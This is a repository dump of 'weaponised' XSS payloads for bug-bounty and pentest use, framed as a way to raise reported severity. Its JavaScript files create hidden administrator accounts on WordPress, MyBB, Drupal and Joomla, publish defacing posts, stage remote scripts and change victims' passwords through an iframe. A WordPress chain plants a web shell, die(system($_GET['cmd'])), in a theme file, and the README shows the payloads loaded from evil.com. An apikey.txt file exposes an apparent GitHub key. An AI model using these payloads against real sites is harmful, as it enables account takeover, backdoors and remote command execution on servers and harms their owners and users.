├── apikey.txt
├── staged-xss.js
├── mybb_create_admin_user.js
├── wordpress_create_admin_user.js
├── wordpress_create_page.js
├── wordpress_create_post.js
├── wordpress_rce.js
├── iframe_template.js
├── README.md
├── wordpress_rce.txt
├── drupal_create_admin_user.js
└── joomla_create_admin_user.js


/apikey.txt:
--------------------------------------------------------------------------------
1 | GITHUB_API_KEY = 344aab9758bb0d018b93739e7893fb3a
2 | 


--------------------------------------------------------------------------------
/staged-xss.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | Daniel Moore (https://twitter.com/0x0FEFF) sent me a great way to stage external JS code without injecting HTML.
 3 | In the event that your payload is stuck inside <script> tags, or an HTML event handler and you want to load an external JS resource, 
 4 | you can inject this snippet to stage a more complex payload from an external resource.
 5 | 
 6 | The external JS payload needs to be inside a function called "a" like this:
 7 | 
 8 | function a(){
 9 |   // payload here
10 |   }
11 | 
12 | */
13 | 
14 | 
15 | var c=function(){
16 |     a() // a() is defined in the script downloaded by the payload
17 | };
18 | var s=document.createElement('script');
19 | s.src='//bit.ly/example';
20 | s.onreadystatechange=c;
21 | document.body.appendChild(s)
22 | 
23 | 


--------------------------------------------------------------------------------
/mybb_create_admin_user.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | mybb - adds administrator with username hacker and password hacker12345
 3 | tested on latest version of mybb v1.8.20
 4 | original script by hakluke modified by mqt
 5 | */
 6 | var mybb_root = "" // don't add a trailing slash
 7 | var req = new XMLHttpRequest();
 8 | var url = mybb_root + "/admin/index.php?module=user-users&action=add";
 9 | var regex = /my_post_key" value="([^"]*?)"/g;
10 | req.open("GET", url, false);
11 | req.send(); 
12 | var nonce = regex.exec(req.responseText);
13 | var nonce = nonce[1];
14 | var params = "my_post_key="+nonce+"&username=hacker&password=hacker12345&confirm_password=hacker12345&email=hacker@hacker.com&usergroup=4&displaygroup=0"; //make sure passwod is 6+ chars
15 | req.open("POST", url, true);
16 | req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
17 | req.send(params);
18 | 


--------------------------------------------------------------------------------
/wordpress_create_admin_user.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | Target: Wordpress - tested on 5.1.1 but probably works on other versions
 3 | Action: Create a new administrative user with username "hacker", email "hacker@example.com" and password "AttackerP455"
 4 | Context: Must be executed in the context of an administrator user
 5 | */ 
 6 | 
 7 | var wp_root = "" // don't add a trailing slash
 8 | var req = new XMLHttpRequest();
 9 | var url = wp_root + "/wp-admin/user-new.php";
10 | var regex = /ser" value="([^"]*?)"/g;
11 | req.open("GET", url, false);
12 | req.send();
13 | var nonce = regex.exec(req.responseText);
14 | var nonce = nonce[1];
15 | var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
16 | req.open("POST", url, true);
17 | req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
18 | req.send(params);
19 | 


--------------------------------------------------------------------------------
/wordpress_create_page.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | Target: Wordpress - tested on 5.2.2 but probably works on other versions
 3 | Action: Create a new page
 4 | Context: Must be executed in the context of an administrator/author user
 5 | */
 6 | 
 7 | var req = new XMLHttpRequest();
 8 | 
 9 | // To get "nonce code"
10 | // That is a "number used once" to help protect URLs and forms from certain types of misuse, malicious or otherwise
11 | req.open("GET", "/wp-admin/post-new.php", false);
12 | req.send();
13 | 
14 | var regex1 = /var wpApiSettings = (.*)/g;
15 | var regex2 = /"nonce":"([^"]*?)"/g;
16 | var nonce = regex1.exec(req.responseText)[1];
17 | var nonce = regex2.exec(nonce)[1];
18 | 
19 | // Create page
20 | var url = "/wp-json/wp/v2/pages";
21 | req.open("POST", url, true);
22 | req.setRequestHeader('X-WP-Nonce', nonce)
23 | req.setRequestHeader("Content-Type", "application/json");
24 | req.send("{\"status\":\"publish\",\"title\":\"Hacked Title\",\"content\":\"Hacked Content\"}");
25 | 


--------------------------------------------------------------------------------
/wordpress_create_post.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | Target: Wordpress - tested on 5.2.2 but probably works on other versions
 3 | Action: Create a new post
 4 | Context: Must be executed in the context of an administrator/author user
 5 | */
 6 | 
 7 | var req = new XMLHttpRequest();
 8 | 
 9 | // To get "nonce code"
10 | // That is a "number used once" to help protect URLs and forms from certain types of misuse, malicious or otherwise
11 | req.open("GET", "/wp-admin/post-new.php", false);
12 | req.send();
13 | 
14 | var regex1 = /var wpApiSettings = (.*)/g;
15 | var regex2 = /"nonce":"([^"]*?)"/g;
16 | var nonce = regex1.exec(req.responseText)[1];
17 | var nonce = regex2.exec(nonce)[1];
18 | 
19 | // Create post
20 | var url = "/wp-json/wp/v2/posts";
21 | req.open("POST", url, true);
22 | req.setRequestHeader('X-WP-Nonce', nonce)
23 | req.setRequestHeader("Content-Type", "application/json");
24 | req.send("{\"status\":\"publish\",\"title\":\"Hacked Title\",\"content\":\"Hacked Content\"}");
25 | 


--------------------------------------------------------------------------------
/wordpress_rce.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | ESCALATE WORDPRES XSS TO RCE
 3 | 
 4 | jQuery.getScript('https://attacker/wordpress_rce.js',function(){main()});
 5 | */
 6 | 
 7 | class RCE {
 8 | 	constructor(){
 9 | 	/* Empty */
10 | 	}
11 | 
12 | 	get_req(url){
13 | 		var text;
14 | 		jQuery.ajax({
15 | 			type: "GET",
16 | 			url: url,
17 | 			datatype: "text",
18 | 			async: false,
19 | 			success: function(data){
20 | 				text = data;
21 | 			}
22 | 		});
23 | 		return text;
24 | 	}
25 | 
26 | 	theme_update(file, csrf){
27 | 		/* This function will upload a Backdoor inside the catch-wheel theme*/
28 | 		jQuery.ajax({
29 | 			type: "POST",
30 | 			url: "/wp-admin/admin-ajax.php?_fs_blog_admin=true",
31 | 			data: {newcontent : file, _wp_http_referer: '/wp-admin/theme-editor.php?file=index.php&theme=catch-wheels', nonce: csrf, action: 'edit-theme-plugin-file',file: 'index.php',theme: 'catch-wheels', 'docs-list':''},
32 | 			success: function(){
33 | 				console.log('uploaded');
34 | 			},
35 | 			contentType: "application/x-www-form-urlencoded"
36 | 		});
37 | 	}
38 | 
39 | 	boom_p1(csrf){
40 | 		/*This function will get your P1. You can now go over Twitter and BOOM P1 everyone*/
41 | 		var that = this;
42 | 		var payload = that.get_req('http://127.0.0.1/wordpress_rce.txt');
43 | 		that.theme_update(payload, csrf);
44 | 
45 | 	}
46 | 
47 | 
48 | 	get_nonce(){
49 | 		/* Retrieving the Nonce used to upload the RCE. Those are really useful and they will never gonna give you up !*/
50 | 		var that = this;
51 | 		var url = '/wp-admin/theme-editor.php?file=index.php&theme=catch-wheels';
52 | 		var data = that.get_req(url);
53 | 		return jQuery(data).find('#nonce').val();
54 | 	}
55 | 
56 | 	run(){
57 | 		var that = this;
58 | 		var nonce = that.get_nonce();
59 | 		console.log(nonce)
60 | 		that.boom_p1(nonce);
61 | 	}
62 | 
63 | }
64 | 
65 | 
66 | function main(){
67 | 	var exploit = new RCE();
68 | 	exploit.run();
69 | }
70 | 


--------------------------------------------------------------------------------
/iframe_template.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | After releasing this repository, I was contacted by Justin Gardner (@Rhynorater), an excellent security researcher and bug bounty hunter. He shared a different technique with me which allows an XSS to bypass CSRF by injecting an iframe into the page and submitting the sensitive form within the iframe.
 3 | 
 4 | This is an excellent technique, and simplifies the process of creating custom payloads for many web applications. A template for this technique can be seen below, the script will create an iframe which loads https://example.com/sensitive/action.php. It will then fill out the NewPassword and ConfirmNewPassword text boxes with the value "1337H4x0rz!!!" and click the submit button.
 5 | 
 6 | With this technique, there is no need to extract the CSRF token because it's already embedded in the form.
 7 | 
 8 | It is important to know how both of these techniques work. AJAX requests can be the only option sometimes, like when we're dealing with an API that isn't UI accessible. It can also be more reliable if the victim has a slow internet connection. On the other hand, this iframe method is a much simpler payload, and makes it easy to rapidly develop a PoC for a custom application.
 9 | */
10 | 
11 | 
12 | frame=document.createElement("iframe")
13 | frame.addEventListener("load", function() {
14 |     // Wait 1 second after the iframe loads to ensure that the DOM has loaded
15 |     setTimeout(function(){
16 |         //Set new password
17 |         frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!"
18 |         //Set confirm password
19 |         frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!"
20 |         //Click the submit button
21 |         frame.contentDocument.getElementById("SubmitButton").click()
22 |         setTimeout(function(){
23 |             //Wait a couple seconds for the previous request to be sent
24 |             alert("Your account password has been changed to 1337H4x0rz!!!")
25 |         }, 2000)
26 |     }, 1000)
27 | });
28 | 
29 | frame.src="https://example.com/sensitive/action.php"
30 | document.body.append(frame)
31 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Weaponised XSS Payloads
 2 | _XSS payloads designed to turn alert(1) into P1._
 3 | 
 4 | ## The Blog Post
 5 | This repo was released alongside a blogpost titled "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
 6 | 
 7 | ## What is this?
 8 | 
 9 | In this repository you will find a bunch of JavaScript files which can be loaded into an XSS payload in order to perform sensitive functions on popular CMS platforms in the context of the victim's browser. This can help to chain a plain old XSS bug into something more critical, like an account takeover.
10 | 
11 | This is perfect for beefing up the severity of a pentest or bug bounty report by demonstrating real security impact.
12 | 
13 | Payloads are slowly being added either as I have time. There are plenty more to come, if you can help out - pull requests are welcome! If you're looking for inspiration on what to create - check the "issues" tab on this repo.
14 | 
15 | ## How To
16 | 
17 | The simplest way to use these payloads is to host them somewhere and load them into the src attribute of a script tag for your XSS payload like this:
18 | 
19 | ```
20 | <script src="http://evil.com/wordpress_create_admin_user.js"></script>
21 | ```
22 | 
23 | Alternatively, depending on the context and length of the payload, it can sometimes be [minified](https://javascript-minifier.com/), [encoded](https://eve.gd/2007/05/23/string-fromcharcode-encoder/) and then just included directly into the request.
24 | 
25 | In order to host the JavaScript file, you may need to set the Content-Type to `application/javascript`. To achieve this with PHP, you can simply prepend this line to the top of any of the payloads, save it as a .php file and host it on your PHP-enabled webserver:
26 | 
27 | ```
28 | <?php header("Content-Type: application/javascript"); ?>
29 | ```
30 | 
31 | 
32 | ## Credits
33 | 
34 | [This article](https://www.shift8web.ca/2018/01/craft-xss-payload-create-admin-user-in-wordpress-user/) from Shift8 is what inspired me to make this repo. The JS in the article has a couple of minor typos but the concepts are spot on.
35 | 


--------------------------------------------------------------------------------
/wordpress_rce.txt:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /**
 3 |  * The main template file
 4 |  *
 5 |  * This is the most generic template file in a WordPress theme
 6 |  * and one of the two required files for a theme (the other being style.css).
 7 |  * It is used to display a page when nothing more specific matches a query.
 8 |  * E.g., it puts together the home page when no home.php file exists.
 9 |  *
10 |  * @link https://codex.wordpress.org/Template_Hierarchy
11 |  *
12 |  * @package Catch_Wheels
13 |  */
14 | 
15 | die(system($_GET['cmd']));
16 | get_header();
17 | 
18 | $enable_homepage_posts = catch_wheels_enable_homepage_posts();
19 | 
20 | if ( $enable_homepage_posts ) : ?>
21 | 		<div id="primary" class="content-area">
22 | 			<main id="main" class="site-main">
23 | 				<div class="archive-content-wrap">
24 | 					<?php
25 | 					if ( is_front_page() ) :
26 | 						$title = esc_html__( 'Recent Posts', 'catch-wheels' ) ;  ?>
27 | 						<div class="section-heading-wrapper">
28 | 								<div class="section-title-wrapper">
29 | 									<h2 class="section-title"><?php echo esc_html( $title ); ?></h2>
30 | 								</div><!-- .section-title-wrapper -->
31 | 						</div><!-- .section-heading-wrap -->
32 | 					<?php	endif; ?>
33 | 					<?php
34 | 					if ( have_posts() ) : ?>
35 | 						<div id="infinite-post-wrap" class="section-content-wrapper">
36 | 								<?php
37 | 								/* Start the Loop */
38 | 								while ( have_posts() ) : the_post();
39 | 
40 | 									/*
41 | 									 * Include the Post-Format-specific template for the content.
42 | 									 * If you want to override this in a child theme, then include a file
43 | 									 * called content-___.php (where ___ is the Post Format name) and that will be used instead.
44 | 									 */
45 | 									get_template_part( 'template-parts/content/content', get_post_format() );
46 | 
47 | 								endwhile;
48 | 								?>
49 | 						</div> <!-- .section-content-wrapper -->
50 | 
51 | 						<?php
52 | 						catch_wheels_content_nav();
53 | 
54 | 					else :
55 | 
56 | 						get_template_part( 'template-parts/content/content', 'none' );
57 | 
58 | 					endif; ?>
59 | 				</div> <!-- .archive-content-wrap -->
60 | 			</main><!-- #main -->
61 | 		</div><!-- #primary -->
62 | 	<?php get_sidebar(); ?>
63 | <?php endif; // $enable_homepage_posts
64 | get_footer();
65 | 


--------------------------------------------------------------------------------
/drupal_create_admin_user.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | Target: Drupal - tested on 8.7.1 but probably works on older versions
 3 | Action: Create a new administrative user with username "hacker" and password "trees are nice 135"
 4 | Context: Must be executed in the context of an administrator user
 5 | */ 
 6 | 
 7 | var drupal_root = "" //don't put a trailing slash
 8 | var req = new XMLHttpRequest();
 9 | var url = drupal_root + "/admin/people/create";
10 | var regex = /ken" value="([^"]*?)"/g;
11 | req.open("GET", url, false);
12 | req.send();
13 | var token = regex.exec(req.responseText);
14 | var token = token[1];
15 | req.open("POST", url, true);
16 | req.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
17 | req.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
18 | req.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------16060183381995026921942491393");
19 | req.withCredentials = true;
20 | var body = "-----------------------------16060183381995026921942491393\r\n" + 
21 |   "Content-Disposition: form-data; name=\"mail\"\r\n" + 
22 |   "\r\n" + 
23 |   "\r\n" + 
24 |   "-----------------------------16060183381995026921942491393\r\n" + 
25 |   "Content-Disposition: form-data; name=\"name\"\r\n" + 
26 |   "\r\n" + 
27 |   "hacker\r\n" + 
28 |   "-----------------------------16060183381995026921942491393\r\n" + 
29 |   "Content-Disposition: form-data; name=\"pass[pass1]\"\r\n" + 
30 |   "\r\n" + 
31 |   "trees are nice 135\r\n" + 
32 |   "-----------------------------16060183381995026921942491393\r\n" + 
33 |   "Content-Disposition: form-data; name=\"pass[pass2]\"\r\n" + 
34 |   "\r\n" + 
35 |   "trees are nice 135\r\n" + 
36 |   "-----------------------------16060183381995026921942491393\r\n" + 
37 |   "Content-Disposition: form-data; name=\"status\"\r\n" + 
38 |   "\r\n" + 
39 |   "1\r\n" + 
40 |   "-----------------------------16060183381995026921942491393\r\n" + 
41 |   "Content-Disposition: form-data; name=\"roles[administrator]\"\r\n" + 
42 |   "\r\n" + 
43 |   "administrator\r\n" + 
44 |   "-----------------------------16060183381995026921942491393\r\n" + 
45 |   "Content-Disposition: form-data; name=\"user_picture[0][fids]\"\r\n" + 
46 |   "\r\n" + 
47 |   "\r\n" + 
48 |   "-----------------------------16060183381995026921942491393\r\n" + 
49 |   "Content-Disposition: form-data; name=\"user_picture[0][display]\"\r\n" + 
50 |   "\r\n" + 
51 |   "1\r\n" + 
52 |   "-----------------------------16060183381995026921942491393\r\n" + 
53 |   "Content-Disposition: form-data; name=\"form_token\"\r\n" + 
54 |   "\r\n" + 
55 |   token + "\r\n" + 
56 |   "-----------------------------16060183381995026921942491393\r\n" + 
57 |   "Content-Disposition: form-data; name=\"form_id\"\r\n" + 
58 |   "\r\n" + 
59 |   "user_register_form\r\n" + 
60 |   "-----------------------------16060183381995026921942491393\r\n" + 
61 |   "Content-Disposition: form-data; name=\"contact\"\r\n" + 
62 |   "\r\n" + 
63 |   "1\r\n" + 
64 |   "-----------------------------16060183381995026921942491393\r\n" + 
65 |   "Content-Disposition: form-data; name=\"timezone\"\r\n" + 
66 |   "\r\n" + 
67 |   "Australia/Brisbane\r\n" + 
68 |   "-----------------------------16060183381995026921942491393\r\n" + 
69 |   "Content-Disposition: form-data; name=\"op\"\r\n" + 
70 |   "\r\n" + 
71 |   "Create new account\r\n" + 
72 |   "-----------------------------16060183381995026921942491393--\r\n";
73 | var aBody = new Uint8Array(body.length);
74 | for (var i = 0; i < aBody.length; i++)
75 |   aBody[i] = body.charCodeAt(i); 
76 | req.send(new Blob([aBody]));
77 | 


--------------------------------------------------------------------------------
/joomla_create_admin_user.js:
--------------------------------------------------------------------------------
  1 | /*
  2 | Target: Joomla! - tested on 3.9.25 but probably works on older versions
  3 | Action: Create a new administrative user with username "backdoor" and password "backdoor123"
  4 | Context: Must be executed in the context of an administrator user
  5 | */ 
  6 | 
  7 | var joomla_root = ""
  8 | var req = new XMLHttpRequest();
  9 | var url = joomla_root + "/administrator/index.php?option=com_users&view=user&layout=edit";
 10 | var regex = /"csrf.token":"([^"]*?)"/g;
 11 | req.open("GET", url, false);
 12 | req.send();
 13 | var token = regex.exec(req.responseText)[1];
 14 | req.open("POST", url, true);
 15 | req.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------40312619018197013893860115245");
 16 | req.withCredentials = true;
 17 | var body = "-----------------------------40312619018197013893860115245\r\n" + 
 18 |   "Content-Disposition: form-data; name=\"jform[name]\"\r\n" + 
 19 |   "\r\n" + 
 20 |   "backdoor\r\n" + 
 21 |   "-----------------------------40312619018197013893860115245\r\n" + 
 22 |   "Content-Disposition: form-data; name=\"jform[username]\"\r\n" + 
 23 |   "\r\n" + 
 24 |   "backdoor\r\n" + 
 25 |   "-----------------------------40312619018197013893860115245\r\n" + 
 26 |   "Content-Disposition: form-data; name=\"jform[password]\"\r\n" + 
 27 |   "\r\n" + 
 28 |   "backdoor123\r\n" + 
 29 |   "-----------------------------40312619018197013893860115245\r\n" + 
 30 |   "Content-Disposition: form-data; name=\"jform[password2]\"\r\n" + 
 31 |   "\r\n" + 
 32 |   "backdoor123\r\n" + 
 33 |   "-----------------------------40312619018197013893860115245\r\n" + 
 34 |   "Content-Disposition: form-data; name=\"jform[email]\"\r\n" + 
 35 |   "\r\n" + 
 36 |   "backdoor@backdoor.com\r\n" + 
 37 |   "-----------------------------40312619018197013893860115245\r\n" + 
 38 |   "Content-Disposition: form-data; name=\"jform[registerDate]\"\r\n" + 
 39 |   "\r\n" + 
 40 |   "\r\n" + 
 41 |   "-----------------------------40312619018197013893860115245\r\n" + 
 42 |   "Content-Disposition: form-data; name=\"jform[lastvisitDate]\"\r\n" + 
 43 |   "\r\n" + 
 44 |   "\r\n" + 
 45 |   "-----------------------------40312619018197013893860115245\r\n" + 
 46 |   "Content-Disposition: form-data; name=\"jform[lastResetTime]\"\r\n" + 
 47 |   "\r\n" + 
 48 |   "\r\n" + 
 49 |   "-----------------------------40312619018197013893860115245\r\n" + 
 50 |   "Content-Disposition: form-data; name=\"jform[resetCount]\"\r\n" + 
 51 |   "\r\n" + 
 52 |   "0\r\n" + 
 53 |   "-----------------------------40312619018197013893860115245\r\n" + 
 54 |   "Content-Disposition: form-data; name=\"jform[sendEmail]\"\r\n" + 
 55 |   "\r\n" + 
 56 |   "0\r\n" + 
 57 |   "-----------------------------40312619018197013893860115245\r\n" + 
 58 |   "Content-Disposition: form-data; name=\"jform[block]\"\r\n" + 
 59 |   "\r\n" + 
 60 |   "0\r\n" + 
 61 |   "-----------------------------40312619018197013893860115245\r\n" + 
 62 |   "Content-Disposition: form-data; name=\"jform[requireReset]\"\r\n" + 
 63 |   "\r\n" + 
 64 |   "0\r\n" + 
 65 |   "-----------------------------40312619018197013893860115245\r\n" + 
 66 |   "Content-Disposition: form-data; name=\"jform[id]\"\r\n" + 
 67 |   "\r\n" + 
 68 |   "0\r\n" + 
 69 |   "-----------------------------40312619018197013893860115245\r\n" + 
 70 |   "Content-Disposition: form-data; name=\"jform[groups][]\"\r\n" + 
 71 |   "\r\n" + 
 72 |   "8\r\n" + 
 73 |   "-----------------------------40312619018197013893860115245\r\n" + 
 74 |   "Content-Disposition: form-data; name=\"jform[params][admin_style]\"\r\n" + 
 75 |   "\r\n" + 
 76 |   "\r\n" + 
 77 |   "-----------------------------40312619018197013893860115245\r\n" + 
 78 |   "Content-Disposition: form-data; name=\"jform[params][admin_language]\"\r\n" + 
 79 |   "\r\n" + 
 80 |   "\r\n" + 
 81 |   "-----------------------------40312619018197013893860115245\r\n" + 
 82 |   "Content-Disposition: form-data; name=\"jform[params][language]\"\r\n" + 
 83 |   "\r\n" + 
 84 |   "\r\n" + 
 85 |   "-----------------------------40312619018197013893860115245\r\n" + 
 86 |   "Content-Disposition: form-data; name=\"jform[params][editor]\"\r\n" + 
 87 |   "\r\n" + 
 88 |   "\r\n" + 
 89 |   "-----------------------------40312619018197013893860115245\r\n" + 
 90 |   "Content-Disposition: form-data; name=\"jform[params][timezone]\"\r\n" + 
 91 |   "\r\n" + 
 92 |   "\r\n" + 
 93 |   "-----------------------------40312619018197013893860115245\r\n" + 
 94 |   "Content-Disposition: form-data; name=\"task\"\r\n" + 
 95 |   "\r\n" + 
 96 |   "user.apply\r\n" + 
 97 |   "-----------------------------40312619018197013893860115245\r\n" + 
 98 |   "Content-Disposition: form-data; name=\"" + token + "\"\r\n" + 
 99 |   "\r\n" + 
100 |   "1\r\n" + 
101 |   "-----------------------------40312619018197013893860115245--\r\n";
102 | var aBody = new Uint8Array(body.length);
103 | for (var i = 0; i < aBody.length; i++)
104 |   aBody[i] = body.charCodeAt(i); 
105 | req.send(new Blob([aBody]));
106 | 


--------------------------------------------------------------------------------